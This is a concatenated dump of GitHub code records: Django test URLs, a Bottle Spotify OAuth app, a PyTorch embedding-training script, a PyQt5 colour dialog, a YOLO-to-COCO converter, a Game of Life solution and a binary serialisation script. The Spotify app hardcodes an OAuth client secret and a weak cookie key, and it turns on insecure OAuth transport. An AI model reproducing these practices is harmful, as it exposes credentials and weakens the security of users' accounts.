custom_page_url\nfrom tests.ecommerce.views import (\n MockAddToCart, MockChangeCount, MockFlushCart, MockRemoveFromCart\n)\n\ntest_url = [\n url(r'^cart-add/$', MockAddToCart.as_view(), name='cart_add'),\n url(r'^cart-change/$', MockChangeCount.as_view(), name='cart_set_count'),\n url(r'^cart-flush/$', MockFlushCart.as_view(), name='cart_flush'),\n url(r'^cart-remove/$', MockRemoveFromCart.as_view(), name='cart_remove'),\n]\n\nurlpatterns = [\n url(r'^catalog/', include('catalog.urls')),\n url(r'^shop/', include(test_url)),\n custom_page_url(r'^shop/(?P<page>order)/$', views.OrderPage.as_view()),\n custom_page_url(r'^shop/(?P<page>order-success)/$', views.OrderSuccess.as_view()),\n]\n","repo_name":"fidals/refarm-site","sub_path":"tests/ecommerce/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"7273571125","text":"from bottle import Bottle, route, run, request, template, default_app, static_file, get, post, response, redirect \nimport requests\nfrom requests_oauthlib import OAuth2Session\nfrom oauthlib.oauth2 import TokenExpiredError\nfrom urlparse import parse_qs\nimport json\nimport os\n\nclient_id='d4be1938c2954285b3da4eb6ed81743c'\nclient_secret='f0c4c13ea86a4d98812a56a1b57c876b'\nredirect_uri = 'http://spotype-aitor28ld.rhcloud.com/callback'\nscope = ['playlist-modify-public', 'playlist-modify-private']\ntoken_url = \"https://accounts.spotify.com/api/token\"\n\n\ndef token_valido():\n token=request.get_cookie(\"token\", secret='some-secret-key')\n if token:\n token_ok = True\n try:\n oauth2 = OAuth2Session(client_id, token=token)\n r = oauth2.get('https://www.googleapis.com/oauth2/v1/userinfo')\n except TokenExpiredError as e:\n token_ok = False\n else:\n token_ok = False\n return token_ok\n\n@get('/login')\ndef LOGIN():\n if token_valido():\n redirect(\"/perfil\")\n else:\n response.set_cookie(\"token\", '',max_age=0)\n oauth2 = OAuth2Session(client_id, redirect_uri=redirect_uri,scope=scope)\n authorization_url, state = oauth2.authorization_url('https://accounts.spotify.com/authorize/')\n response.set_cookie(\"oauth_state\", state)\n redirect(authorization_url)\n\n@get('/callback')\ndef get_token():\n\n oauth2 = OAuth2Session(client_id, state=request.cookies.oauth_state,redirect_uri=redirect_uri)\n token = oauth2.fetch_token(token_url, client_secret=client_secret,authorization_response=request.url)\n response.set_cookie(\"token\", token,secret='some-secret-key')\n redirect(\"/perfil\")\n\n@get('/perfil')\ndef personal():\n\ttoken = request.get_cookie(\"token\", secret='some-secret-key')\n\ttokens = token[\"token_type\"]+\" \"+token[\"access_token\"]\n\theaders = {\"Accept\":\"aplication/json\",\"Authorization\":tokens}\n\tperfil = requests.get(\"https://api.spotify.com/v1/me\", headers=headers)\n\tif perfil.status_code == 200:\n\t\tcuenta = perfil.json()\n\t\t\n\treturn template('perfil.tpl', perfil=cuenta)\n\n@get('/formlista')\ndef formlista():\n\treturn template('lista.tpl')\n\n@post('/lista')\ndef lista():\n\tnombreid = request.forms.get('id')\n\tnombrepl = request.forms.get('name')\n\tpublica = request.forms.get('public')\n\ttoken = request.get_cookie(\"token\", secret='some-secret-key')\n\t#Crear la cookie del id y de la playlist\n\t#Cambiar y poner un checkbox al tipo de playlist\n\ttokens = token[\"token_type\"]+\" \"+token[\"access_token\"]\n\theaders = {\"Accept\":\"aplication/json\",\"Authorization\":tokens}\n\tdata = json.dumps({\"name\":nombrepl,\"public\":publica})\n\tlista = requests.post(\"https://api.spotify.com/v1/users/\"+str(nombreid)+\"/playlists\",headers=headers,data=data)\n\tif lista.status_code != 200:\n\t\tlis= lista.json()\n\t\tlistas=lis\n\t\t\n\t\treturn template('creador.tpl', listas=listas)\n\n@get('/addtracks/<name>/<playlist>')\ndef tracks(name,playlist):\n\tname = name\n\tplaylist = playlist\t\n\treturn template('addtracks.tpl',name = name,playlist = playlist)\n\n@get('/playlist/<name>/<play>')\ndef plays(name,play):\n\tname=name\n\tplay=play \n\treturn template('datos.tpl', name=name , play=play)\n\t\n@post('/final/<id>/<playli>')\ndef final(id,playli):\n\tname = id\n\tpl = playli\n\turi = request.forms.get('uri')\n\ttoken = request.get_cookie(\"token\", secret='some-secret-key')\n\ttokens = token[\"token_type\"]+\" \"+token[\"access_token\"]\n\theaders = {\"Accept\":\"aplication/json\",\"Authorization\":tokens}\n\tfin = requests.post(\"https://api.spotify.com/v1/users/\"+str(name)+\"/playlists/\"+str(pl)+\"/tracks?uris=\"+str(uri), headers=headers)\n\tif fin.status_code == 201:\n\t\tf = requests.get(\"https://api.spotify.com/v1/users/\"+str(name)+\"/playlists/\"+str(pl), headers=headers)\n\t\tif f.status_code == 200:\n\t\t\tfina = f.json()\n\t\n\t\treturn template('final.tpl', final=fina)\n\t\n@route('/')\ndef index():\n return template('index.tpl')\n\n@route('/search',method='POST')\ndef search():\n\tbuscador = request.forms.get('buscador')\n\topciones = request.forms.get('opciones')\n\tdatos={\"q\":buscador,\"type\":opciones}\n\tif opciones == \"artist\":\n\t\tartistas = requests.get(\"https://api.spotify.com/v1/search\", params=datos)\n\t\tif artistas.status_code == 200:\n\t\t\tartista=artistas.json()\n\t\t\tartis=artista[\"artists\"][\"items\"]\n\t\t\n\t\treturn template('artistas.tpl', artis=artis)\n\tif opciones == \"track\":\n\t\tcanciones = requests.get(\"https://api.spotify.com/v1/search\", params=datos)\n\t\tif canciones.status_code == 200:\n\t\t\tcancion = canciones.json()\n\t\n\t\treturn template(\"canciones.tpl\", canciones=cancion)\n\tif opciones == \"album\":\n\t\talbums = requests.get(\"https://api.spotify.com/v1/search\", params=datos)\n\t\tif albums.status_code == 200:\n\t\t\talbum = albums.json()\n\t\t\n\t\treturn template(\"albums.tpl\", album=album)\n\t\t\n\tif opciones == \"playlist\":\n\t\tlista = requests.get(\"https://api.spotify.com/v1/search\", params=datos)\n\t\tif lista.status_code == 200:\n\t\t\tplaylist = lista.json()\n\t\t\n\t\treturn template('playlist.tpl', playlist=playlist)\n\n\n@route('/static/<filepath:path>')\ndef server_static(filepath):\n return static_file(filepath, root='static')\n\n\n\n# This must be added in order to do correct path lookups for the views\nimport os\nfrom bottle import TEMPLATE_PATH\nos.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\nTEMPLATE_PATH.append(os.path.join(os.environ['OPENSHIFT_REPO_DIR'], 'wsgi/views/')) \n\napplication=default_app()\n","repo_name":"aitor28ld/Webplayer-con-spotify","sub_path":"wsgi/mybottleapp.py","file_name":"mybottleapp.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24510803164","text":"\"\"\"\r\npython3 train.py -p ../SSD/JR/Arcface_MS1MV3_R100_idemia_0_33/ -d 512 -g 0 -s k,k\r\n\r\nJean-Remy Conti\r\n2022\r\n\"\"\"\r\n\r\n\r\nimport argparse\r\nimport numpy as np\r\nimport torch\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nimport os\r\nimport time\r\nimport datetime\r\nfrom tqdm import tqdm\r\nfrom pathlib import Path\r\n\r\nfrom utils.numpy_dataset import NumpyDataset\r\nfrom backbones import get_model\r\nfrom ethical_module import MLP, EthicalModule, FairModel\r\n\r\n\r\nparser = argparse.ArgumentParser(description='vMF training')\r\nparser.add_argument('-p', '--path_data', help='Path to numpy data folder', type=str)\r\nparser.add_argument('-d', '--dim', type=int, default=512, help='Feature space dimension') # 512 \r\nparser.add_argument('-s', '--scales', help='list of scale parameters', type=str)\r\nparser.add_argument('-n', '--network', default=None, help='Backbone network (r18, r34, r50, r100) of pre-trained model. '+\r\n\t\t\t\t\t\t\t\t\t\t\t\t' Set to None to avoid validation during training.', type=str)\r\nparser.add_argument('-g', '--gpu', default=0, type=int, help='GPU ids', nargs='+')\r\n\r\n\r\n#------------ Parameters ---------------#\r\n\r\nseed = 42 \r\n\r\nn_epochs = 50\r\nn_epochs_to_print = 1 # Number of epochs between each epoch loss print\r\nn_epochs_to_save = 2 # Number of epochs between each model checkpoint save\r\n\r\nlr = 0.01\r\nbatch_size = 1024\r\n\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\nprint('Device:', device)\r\n\r\n\r\ndef train(dataset, feat_dim = 512, kappas = 5.0, n_epochs = 200, lr = 0.01, seed = 42, batch_size = 32, device_ids= None):\r\n\t\"\"\"\r\n\tParameters\r\n\t----------\r\n\tdataset: NumpyDataset instance imported from numpy_dataset.\r\n\t\tdataset[input_idx] : tuple (embeddings[idx], torch.tensor(label[idx], gender[idx]))\r\n\t\tembeddings = dataset[:][0] \r\n\t\tembeddings[idx] = dataset[idx][0]\r\n\t\ttorch.tensor(label, gender) = dataset[:][1] || shape (n_points x 2)\r\n\t\tlabel = dataset[:][1][:,0]\r\n\t\tgender = dataset[:][1][:,1]\r\n\t\tlabel[idx] = dataset[idx][1][0]\r\n\t\tgender[idx] = dataset[idx][1][1]\r\n\tfeat_dim: int\r\n\tkappas: float or list of floats\r\n\t\tSee vmf_loss.py.\r\n\tn_epochs: int\r\n\tlr: float\r\n\tseed: int\r\n\t\tUsed to reproduce some random operations such as shuffling dataset.\r\n\tbatch_size: int\r\n\tdevice_ids: list\r\n\t\tList of GPU ids to use torch.nn.DataParallel.\r\n\t\tCan be None if only one device is used.\r\n\t\"\"\"\r\n\r\n\ttorch.manual_seed(seed)\r\n\r\n\tn_points = len(dataset)\r\n\tn_classes = torch.max(dataset[:][1][:,0]).item() + 1\r\n\tassert n_classes <= n_points, 'Please use more data points than centroids.'\r\n\t\r\n\t# Reduce list of concentration parameters\r\n\tif type(kappas) != list:\r\n\t\tkappas = [kappas]\r\n\tn_kappas = torch.unique( torch.FloatTensor(kappas) ).size(0)\r\n\r\n\t# Used to define vMF loss\r\n\tif n_kappas > 1:\r\n\t\t# Get the ordered set of unique labels alongside their corresponding genders\r\n\t\tlabels_set = dataset.get_labels_set().to(device)\r\n\telse:\r\n\t\tkappas = kappas[0]\r\n\t\tlabels_set=None\r\n\r\n\t# Display info of current model\r\n\tprint('#-------------- INFO --------------#')\r\n\tprint('Number of classes: ', n_classes)\r\n\tprint('Number of data points: ', n_points, '\\n')\r\n\tprint('Concentration parameters: ', kappas, '\\n')\r\n\tprint()\r\n\r\n\t# ------- Initialize training ------- # \r\n\ttrain_size = len(dataset)\r\n\ttrain_loader = torch.utils.data.DataLoader(dataset, batch_size= batch_size, shuffle=True)\r\n\t\r\n\t# Define model\r\n\td_in = dataset[0][0].size()[0]\r\n\th = 2 * d_in \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\r\n\tmodel = MLP(d_in, h, feat_dim) # network transforming embeddings\r\n\tmodule = EthicalModule(model, n_classes, kappas, labels_set= labels_set)\r\n\tmodule.to(device)\r\n\tif type(device_ids) == list and len(device_ids) > 1:\r\n\t\tprint('multi-GPU')\r\n\t\t# multi-GPU setting\r\n\t\tmodule = torch.nn.DataParallel(module, device_ids = device_ids).to(device)\r\n\t\t# Save model architecture (but random weights)\r\n\t\ttorch.save(module.module.model, working_dir + 'model_dummy.pt')\r\n\telse:\r\n\t\ttorch.save(module.model, working_dir + 'model_dummy.pt')\r\n\r\n\toptimizer = torch.optim.Adam(module.parameters(), lr=lr)\r\n\t\r\n\ttrain_losses = []\r\n\tprint('#------------ TRAINING ------------#')\r\n\tn_iter = 1\r\n\tfor epoch in tqdm(range(n_epochs)):\r\n\r\n\t\t#------------ TRAINING ------------#\r\n\t\tmodule.train()\r\n\t\t# Init loss of current epoch\r\n\t\ttrain_loss = 0.0\r\n\r\n\t\t# Batch process\r\n\t\tpbar = tqdm(total= train_size // batch_size) \r\n\t\tfor data, targets in train_loader:\r\n\r\n\t\t\tdata, targets = data.to(device), targets.to(device)\r\n\r\n\t\t\t# Forward\r\n\t\t\tloss, _ = module(data, forward = True, return_loss = True, labels = targets[:,0], get_features = False) \r\n\t\t\t# multi-GPU\r\n\t\t\tloss = loss.mean()\t\t\t\r\n\t\t\tassert np.isnan(loss.item()) == False, \"Loss is NaN !\"\r\n\r\n\t\t\t# Backward\r\n\t\t\toptimizer.zero_grad()\r\n\t\t\tloss.backward()\r\n\t\t\toptimizer.step()\r\n\r\n\t\t\t# Update loss of current epoch\r\n\t\t\ttrain_loss += loss.item() * float(len(data)) / float(train_size) \r\n\t\t\ttb.add_scalar('loss_batch', loss.item(), n_iter)\t\t\r\n\t\t\tpbar.update(1) \r\n\t\t\tn_iter += 1\r\n\t\tpbar.close() \r\n\t\ttrain_losses.append(train_loss)\t\r\n\r\n\t\ttb.add_scalar('loss', train_loss, epoch+1)\r\n\t\ttb.flush()\r\n\r\n\t\t# Print loss\r\n\t\tif (epoch+1) % n_epochs_to_print == 0 or (epoch == n_epochs -1):\r\n\t\t\tprint('Epoch [{}/{}], Train loss: {:.10f}' \r\n\t\t\t\t.format(epoch+1, n_epochs, train_loss))\r\n\r\n\t\t# Save model at each epoch \r\n\t\tif (epoch+1) % n_epochs_to_save == 0:\r\n\t\t\tif type(device_ids) == list and len(device_ids) > 1:\r\n\t\t\t\ttorch.save(module.module.model.state_dict(), working_dir + 'checkpoints/' + str(epoch+1) + '.pt' )\t\r\n\t\t\telse:\r\n\t\t\t\ttorch.save(module.model.state_dict(), working_dir + 'checkpoints/' + str(epoch+1) + '.pt' )\t\r\n\ttb.close()\r\n\r\n\t# Save entire model\r\n\tif type(device_ids) == list and len(device_ids) > 1:\r\n\t\ttorch.save(module.module.model, working_dir + 'model.pt')\r\n\telse:\r\n\t\ttorch.save(module.model, working_dir + 'model.pt')\r\n\tos.remove(working_dir + 'model_dummy.pt')\r\n\r\n\t# Save evolution of losses\r\n\tnp.save(working_dir + 'train_loss', np.array(train_losses))\r\n\r\n\t# Save hyperparameters to config file\r\n\tto_write = []\r\n\tto_write.append(str(datetime.datetime.now().strftime(\"%d/%m/%Y %H:%M\")) + '\\n\\n')\r\n\tto_write.append('Number of epochs: ' + str(epoch+1) + '\\n')\r\n\tto_write.append('Seed: ' + str(seed) + '\\n\\n')\r\n\r\n\tto_write.append('H: ' + str(h) + '\\n')\r\n\tto_write.append('Feature dimension: ' + str(feat_dim) + '\\n\\n')\r\n\r\n\tto_write.append('Learning Rate: ' + str(lr) + '\\n')\r\n\tto_write.append('Batch Size: ' + str(batch_size) + '\\n\\n')\r\n\r\n\tkappas_str = str(kappas)[1:-1] if str(kappas)[0] == '(' else str(kappas)\r\n\tto_write.append('Kappa : ' + kappas_str + '\\n\\n')\r\n\r\n\twith open(working_dir + 'config_training.txt', mode = 'w') as f_w:\r\n\t\t\tfor line in to_write:\r\n\t\t\t\tf_w.write(line)\r\n\r\n\tprint('------------------------------------\\n')\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\t\r\n\t# Take info\r\n\targs = parser.parse_args()\r\n\tprint(\"args\", args, '\\n')\r\n\r\n\t# Load dataset\r\n\tdataset = NumpyDataset(data_folder = args.path_data, root_img = None, gender = True)\r\n\r\n\t# Concentration parameters\r\n\tkappas = [float(item) for item in args.scales.split(',')]\r\n\tkappa_m = kappas[0]\r\n\tkappa_f = kappas[0] if len(kappas) == 1 else kappas[1]\r\n\r\n\t# Output training files destination (USED IN TRAIN FUNCTION)\r\n\tworking_dir = args.path_data + 'training/kappaM_' + str(int(kappa_m)) + '_kappaF_' + str(int(kappa_f)) + '/' \r\n\tPath(working_dir + 'checkpoints/').mkdir(parents= True, exist_ok= True)\r\n\t# Tensorboard\r\n\ttb = SummaryWriter(working_dir + 'logs')\r\n\r\n\t# Start training\r\n\tstart = time.time()\r\n\ttrain(dataset, feat_dim = args.dim, kappas = kappas, n_epochs = n_epochs, \r\n\t\t lr = lr, seed = seed, batch_size = batch_size, device_ids = args.gpu)\r\n\tend = time.time()\r\n\tprint('%.2f s' % (end-start))\r\n\r\n\r\n\r\n\r\n","repo_name":"JRConti/EthicalModule_vMF","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7602,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"10855873650","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nZetCode PyQt5 tutorial\n\nIn this example, we select a color value\nfrom the QColorDialog and change the background\ncolor of a QFrame widget.\n\nAuthor: Jan Bodnar\nWebsite: zetcode.com\nLast edited: August 2017\n\"\"\"\nimport sys\nfrom PyQt5.QtWidgets import (QWidget,QPushButton,QFrame,\n QColorDialog,QApplication)\nfrom PyQt5.QtGui import QColor\n\nclass Example(QWidget):\n def __init__(self):\n super().__init__()\n\n self.initUI()\n# 例子里有一个按钮和一个QFrame,默认的背景颜色为黑色,我们可以使用QColorDialog改变背景颜色\n def initUI(self):\n # 初始化QtGui.QFrame的背景颜色。PyQt5.QtGui object\n col = QColor(255,255,255)# PyQt5.QtGUi.Qcolor对象(颜色已定)\n print(col)\n btn = QPushButton('Dialog',self)\n btn.move(20,20)\n # btn点击后产生事件connect槽showDialog\n btn.clicked.connect(self.showDialog)\n # 绑定一个框架属性fram,\n self.frm = QFrame(self)\n # 框架样式的固定格式背景颜色类似于HTML样式\n self.frm.setStyleSheet(\"QWidget { background-color:%s}\"\n % col.name())#col.name表示的是PyQt5.QtGUi.Qcolor对象的颜色6位十六进制表示#ffffff\n self.frm.setGeometry(130,22,100,100)\n \n self.setGeometry(300,300,250,180)\n self.setWindowTitle('Color dialog')\n self.show()\n \n\n def showDialog(self):\n # 将col重新指向颜色对话框并获取选定的颜色对象\n col = QColorDialog.getColor() # 返回一个PyQt5.QtGUi.Qcolor对象(颜色已定)\n print(col)\n print(col.isValid())\n if col.isValid():\n self.frm.setStyleSheet(\"QWidget { background-color:%s}\"\n % col.name())\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())","repo_name":"klandhu/PyQt5learn","sub_path":"5.2Color_dialog_选取颜色.py","file_name":"5.2Color_dialog_选取颜色.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3406835941","text":"import os\nimport argparse\nimport cv2\nimport json\nimport time\nimport math\n\nfrom tqdm import tqdm\nfrom datetime import date\n\ndef get_args_parser():\n parser = argparse.ArgumentParser('Set conditions', add_help=False)\n parser.add_argument('--base_path', default='/hd/hyunsung/data/gov-thermal/test-20201126/total', type=str)\n parser.add_argument('--txt', default='train.txt', type=str)\n parser.add_argument('--data_path', default='obj_train_data', type=str)\n parser.add_argument('--output_path', default = 'output', type=str)\n parser.add_argument('--cls', default = 'obj.names', type=str)\n return parser\n\ndef main(args):\n base_path = args.base_path\n path_txt = os.path.join(base_path, args.txt)\n \n if not os.path.isdir(args.output_path):\n os.mkdir(args.output_path)\n if not os.path.isdir(os.path.join(args.output_path, 'images')):\n os.mkdir(os.path.join(args.output_path, 'images'))\n os.mkdir(os.path.join(args.output_path, 'annotations'))\n\n image_list = []\n annotation_list = []\n with open(path_txt, 'r') as f:\n while True:\n line = f.readline()\n if not line: break\n image_list.append(line[:-1])\n annotation_list.append(line[:-4]+'txt')\n\n label_json = {}\n label_json['info'] = {'description':'YOLO Dataset', 'url':None, 'version':None, 'contributor':'rauleun', 'date created':date.today().isoformat()}\n label_json['licenses'] = [{'url' : None, 'id':1, 'name':'github.com/rauleun/yolo2coco'}]\n label_json['images'] = []\n label_json['annotations'] = []\n \n img_count = 1\n annt_count = 1\n \n for image_path in tqdm(image_list):\n #time.sleep(0.1)\n json_img = {}\n json_img['license'] = 1\n json_img['file_name'] = image_path.split('/')[-1]\n json_img['coco_url'] = None\n img = cv2.imread(image_path)\n height, width, _ = img.shape \n json_img['height'] = height\n json_img['width'] = width\n json_img['date_captured'] = None\n json_img['flickr_url'] = None\n json_img['id'] = img_count\n label_json['images'].append(json_img)\n \n with open(os.path.join(base_path, args.data_path, image_path.split('/')[-1][:-3]+'txt')) as f_annt:\n while True:\n line_annt = f_annt.readline()\n if not line_annt: break\n\n annt_cls, annt_x, annt_y, annt_w, annt_h = line_annt.split()\n annt_x = width * float(annt_x)\n annt_w = width * float(annt_w)\n annt_y = height * float(annt_y)\n annt_h = height * float(annt_h)\n \n json_annt = {}\n json_annt['segmentation'] = None\n json_annt['area'] = annt_w * annt_h\n json_annt['iscrowd'] = 0 \n json_annt['image_id'] = img_count\n bbox = [annt_x - annt_w/2, annt_y-annt_h/2, annt_w, annt_h]\n if((bbox[0] < 0) or (bbox[1]<0)):\n bbox[0] = max(0, bbox[0])\n bbox[1] = max(0, bbox[1])\n bbox = [math.floor(bbox[0]), math.floor(bbox[1]), math.floor(bbox[2]), math.floor(bbox[3])]\n json_annt['bbox'] = bbox\n json_annt['category_id'] = annt_cls\n json_annt['id'] = annt_count\n label_json['annotations'].append(json_annt)\n annt_count += 1\n img_count += 1\n \n label_json['categories'] = []\n with open(os.path.join(base_path, args.cls)) as f_cls:\n cls_count = 0\n while True:\n line_cls = f_cls.readline()\n if not line_cls: break\n cls = line_cls[:-1]\n cls_annt = {}\n cls_annt['supercategory'] = cls\n cls_annt['id'] = cls_count\n cls_annt['name'] = cls\n label_json['categories'].append(cls_annt)\n cls_count += 1\n \n with open(os.path.join(args.output_path, 'annotations', 'label.json'), \"w+\") as json_file:\n json.dump(label_json, json_file, indent=4)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('Conversion script', parents = [get_args_parser()])\n args = parser.parse_args()\n main(args)\n\n\n","repo_name":"rauleun/yolo2coco","sub_path":"yolo2coco.py","file_name":"yolo2coco.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"4098381140","text":"#!/usr/bin/python -t\n\n#time O(m*n) space O(1)\n\n#0,2 are \"dead\", and \"dead->live\"\n#1,3 are \"live\", and \"live->dead\"\n\nclass Solution(object):\n def gameOfLife(self, board):\n \"\"\"\n :type board: List[List[int]]\n :rtype: None Do not return anything, modify board in-place instead.\n \"\"\"\n m = len(board)\n n = len(board[0])\n for i in range(m):\n for j in range(n):\n if board[i][j] == 0 or board[i][j] == 2:\n if self.nnb(board, i, j) == 3:\n board[i][j] = 2\n else:\n if self.nnb(board, i, j) < 2 or self.nnb(board, i, j) > 3:\n board[i][j] = 3\n \n for i in range(m):\n for j in range(n):\n if board[i][j] == 2:\n board[i][j] = 1\n if board[i][j] == 3:\n board[i][j] = 0\n \n def nnb(self, board, i, j):\n m,n = len(board), len(board[0])\n count = 0\n if i-1 >= 0 and j-1 >= 0: count += board[i-1][j-1]%2\n if i-1 >= 0: count += board[i-1][j]%2\n if i-1 >= 0 and j+1 < n: count += board[i-1][j+1]%2\n if j-1 >= 0: count += board[i][j-1]%2\n if j+1 < n: count += board[i][j+1]%2\n if i+1 < m and j-1 >= 0: count += board[i+1][j-1]%2\n if i+1 < m: count += board[i+1][j]%2\n if i+1 < m and j+1 < n: count += board[i+1][j+1]%2\n return count\n","repo_name":"boknowswiki/mytraning","sub_path":"lc/python/289_game_of_life.py","file_name":"289_game_of_life.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"4291361667","text":"import json, io, os, struct, ast\n\n# Assembling data\nx = [1, 2, 3, 4, 5, 6, 7, 8]\ndata = {'a list': [u'€', u'輝', 1, 42, 3.141, 1337, 1.2345678e-13, 'help', True], #u'€'\n 'a string': 'bla',\n 'another dict': {'foo': 'bar',\n 'key': 'value',\n 'the answer': 42},\n 'David': x}\na_dict = {'new_key': 'new_value'}\ne_dict = {'x': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], \n 'y': [0, 2, 3, 5, 8, 12, 10, 13, 15, 17.9, 21, 25, 35]}\nf_dict = {'z': [1.2345678e37, -8.234567e-37, 1.234567e-13, 1.234567e-13, 1.234567e-13, 1.234567e-13, 1.234567e-13, 1.234567e-13]*1000}\n\ndata.update(a_dict)\ndata.update(e_dict)\n\nprint('\\nWe are now using data comprising of %s character(s):' %len(str(data)))\nprint(str(data))\n\ni = 5 # index of dict of a list\n# Use json to write txt file======================================================\nwith open('data.star', 'w') as txt_file:\n json.dump(data, txt_file) # dumps the dictionary as string format into memory\n# Read txt file with json\nwith open('data.star') as txt_file:\n txt_loaded = json.load(txt_file)\n\nprint('\\njson load TXT:')\nprint('same format after reloading? ', data == txt_loaded)\nprint(txt_loaded['a list'][i])\nprint('data.star: David:',txt_loaded['David'])\nans = txt_loaded['David'][0] + txt_loaded['David'][6]\nprint('1 + 7 = ', ans)\n\n# Use json to Write JSON=============================================================================\nwith io.open('data.json', 'w', encoding='utf8') as json_file:\n json_string = json.dumps(data, indent=4, sort_keys=True, separators=(',', ': '), ensure_ascii=False)\n json_file.write(json_string)\n# Read JSON file with json\nwith open('data.json') as json_file:\n json_loaded = json.load(json_file)\n\nprint('\\njson load proper-JSON:')\nprint('same format after reloading? ', data == json_loaded)\nprint(json_loaded['a list'][i])\nprint('data.json: David:', json_loaded['David'])\nans = json_loaded['David'][0] + json_loaded['David'][6]\nprint('1 + 7 = ', ans)\n\n# Use wb to write json-style data============================================================\nwith open('data.bin', 'wb') as bin_file:\n datastring = bytes(json.dumps(data), 'ascii') #Convert dict to string based on ascii\n bin_file.write(datastring)\nwith open('data.bin') as bin_file:\n bin_loaded = json.load(bin_file) #bin_file seems to be modified after being loaded\nwith open('data.bin','rb') as bin_file: #use rb to read as binary\n bin_read = bin_file.read()\n\nprint('\\njson load BIN:')\nprint('same format after reloading? ', data == bin_loaded)\nprint(bin_loaded['a list'][i])\nprint('data.bin: David:', bin_loaded['David'])\nans = bin_loaded['David'][0] + bin_loaded['David'][6]\nprint('1 + 7 = ', ans)\n\nprint('\\nDirect READ: bin_read (half of it): ', bin_read[:round(len(bin_read)/2)])\nprint('-> turned out to be just a string array!')\nprint('Converted to list:', str(bin_read).split(','))\nprint('\\ne.g. the first element:')\nprint(str(bin_read).split(',')[0], ' ...which is weird!!!')\n\n# Use UTF-8 encoding to build a file for <data>\ndatas = str(data)\nprint(\"\\nSerialized Data (Length: %s): %s\" %(len(datas), datas))\nwith open('data.utf', 'wb') as utfile:\n utfile.write(datas.encode('utf-8'))\n\n# Comparing FILESIZE of the same content using 3 different approaches:\nprint(\"\\nComparing FILESIZE:\")\nprint('data.star: ', os.path.getsize('data.star'), 'bytes (txt: no indent, no sort)')\nprint('data.json: ', os.path.getsize('data.json'), 'bytes (json style, indented, sorted)')\nprint('data.bin: ', os.path.getsize('data.bin'), 'bytes (identical to txt)')\nprint('(whose byte-length is %s)' %len(bin_read))\ndatautfsize = os.path.getsize('data.utf')\nprint('data.utf: ', datautfsize, 'bytes (utf-8 encoding)\\n')\n\n# Manipulating data representation=======================================================\n# mapping binary content of previous \"datastring\":\nprint(\"String representation of the Binary-Data (s-length: %s):\" %len(str(datastring)))\nprint(str(datastring))\nbin_groups = \" \".join(map(bin, datastring)) #convert bytes-array to spaced-binary-string\nprint(\"Bytes-array of Binary-Data (length: %s):\\n%s\" %(len(bin_groups.split(\" \")), bin_groups))\n# dict to binary: (in string representation)\ndatastring = json.dumps(data)\nprint(\"\\njson-dumps Data-String:\\n %s\" %datastring)\ndatabinary = ' '.join(format(ord(letter), 'b') for letter in datastring) #still a string displaying binary form\nprint('data in binary:\\n', databinary)\n# binary to dict: (in string representation)\njsn = ''.join(chr(int(x, 2)) for x in databinary.split(' '))\njsn = json.loads(jsn) # <class 'dict'>\nprint('\\nput back as dict: ', jsn)\n\n# Truncating and Appending to File's content:\nfrom os import SEEK_END\nfrom random import random as rd\nwith open('data.star', 'rb+') as star:\n steps = 2\n file_position = star.seek(-steps, SEEK_END)\n print(\"\\nWe are now at position %s after %s step(s) back-seeking in data.star\" %(file_position, steps))\n star.truncate()\n star.write(bytes(', ', 'ascii'))\n star.write(bytes('{:.0f}'.format(rd()*100), 'ascii'))\n star.write(bytes(']}', 'ascii'))\n\n# Inserting IEEE-754 data\nwith open('data.utf', 'rb+') as star:\n steps = 1\n file_position = star.seek(-steps, SEEK_END)\n print(\"\\nWe are now at position %s after %s step(s) back-seeking in data.utf\" %(file_position, steps))\n star.truncate()\n star.write(bytes(\", 'z':\", 'ascii'))\n D = f_dict['z'] # it's a list\n s = struct.pack('>' + 'd'*len(D), *D) # f:32bit, d:64bit each floating-number\n print(\"\\nwriting %s bytes into data.utf\" %len(s))\n star.write(b'\\x05' + s + b'\\x06')\n star.write(bytes(\"}\", 'ascii'))\n\nprint('After inserted d-64-array, data.utf: ', os.path.getsize('data.utf'), 'bytes (utf-8 encoding)\\n')\nfloatsize = os.path.getsize('data.utf') - datautfsize - len(\", 'z':\") - 2\nprint(\"Float size of data of length %s is thus %s\" %(len(D), floatsize))\n\n# *** Read-out the IEEE-754 data-array ***\ndatastring = ''\nwith open('data.utf','rb') as bin_file: #use rb to read as binary\n bin_file.seek(0)\n full_read = bin_file.read()\n float_start = full_read.find(b'\\x05') #ENQ (Enquiry)\n float_end = full_read.find(b'\\x06') #ACK (Acknowledge)\n print(\"\\nDouble-check the byte-size again:\")\n print(\"IEEE-data starts from location-%s\" %float_start)\n print(\"and it ends at location-%s\\n\" %float_end)\n bin_file.seek(0)\n bin_read = bin_file.read(float_start)\n datastring += bin_read.decode('utf-8')\n bin_file.seek(float_start+1) #skip floating-marker-byte \\x07 (start)\n z_read = bin_file.read(float_end-float_start-1)\n print(\"The length of the floating-points: %s\" %((float_end-float_start-1)//8))\n unfloat = struct.unpack('>' + 'd'*((float_end-float_start-1)//8), z_read) #unpacking IEEE-754 encoded float-points\n datastring += str(list(unfloat))\n 